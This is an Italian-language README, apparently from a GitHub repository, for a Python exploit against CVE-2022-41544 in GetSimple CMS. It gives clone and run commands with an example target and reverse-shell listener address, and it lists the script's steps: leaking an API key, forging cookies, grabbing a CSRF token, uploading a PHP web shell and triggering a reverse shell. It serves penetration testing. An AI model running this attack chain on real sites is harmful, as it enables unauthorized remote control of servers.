
Script di exploit in Python per CVE-2022-41544 in GetSimple CMS. Automatizza la fuga di chiavi API, l'estrazione del token CSRF, il caricamento di shell PHP e l'attivazione di reverse shell per test di penetrazione.
Questo repository contiene uno script per sfruttare la vulnerabilità CVE-2022-41544 in GetSimple CMS. Lo script esegue diversi passaggi per verificare la presenza di vulnerabilità, divulgare le chiavi API, impostare i cookie, ottenere i token CSRF, caricare una shell e attivarla.
telnetlib in quanto non necessario per la funzionalità dello script.Clona il repository:
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
Installa le dipendenze:
Assicurati di avere Python 3 installato insieme alla libreria requests.
pip3 install requests
Esegui lo script:
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
<target>: Il dominio o l'indirizzo IP di destinazione.<path>: Il percorso dell'installazione di GetSimple CMS.<ip:port>: L'IP e la porta per la reverse shell.<username>: Il nome utente amministratore per GetSimple CMS.Esempio:
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin


print_the_banner(): Visualizza un banner stilizzato utilizzando ASCII art.get_version(target, path): Verifica se la versione target di GetSimple CMS è vulnerabile.api_leak(target, path): Tenta di recuperare una chiave API da un file XML di autorizzazione.set_cookies(username, version, apikey): Imposta i cookie necessari per le richieste successive in base alla chiave API recuperata.get_csrf_token(target, path, headers): Estrae un token CSRF necessario per caricare una shell.upload_shell(target, path, headers, nonce, shell_content): Carica una shell PHP sul server target.shell_trigger(target, path): Attiva la shell caricata per stabilire una connessione reverse shell.La funzione main() coordina l'intero processo chiamando in sequenza le funzioni sopra elencate per sfruttare la vulnerabilità CVE-2022-41544.
Questo script è stato sviluppato da h3x0v3rl0rd.
Questo script è fornito solo a scopo educativo. L'accesso non autorizzato ai sistemi è illegale e non etico. Utilizza questo script in modo responsabile e solo su sistemi per cui hai esplicita autorizzazione a effettuare test.
Questo progetto è rilasciato sotto la licenza MIT - consulta il file LICENSE per i dettagli.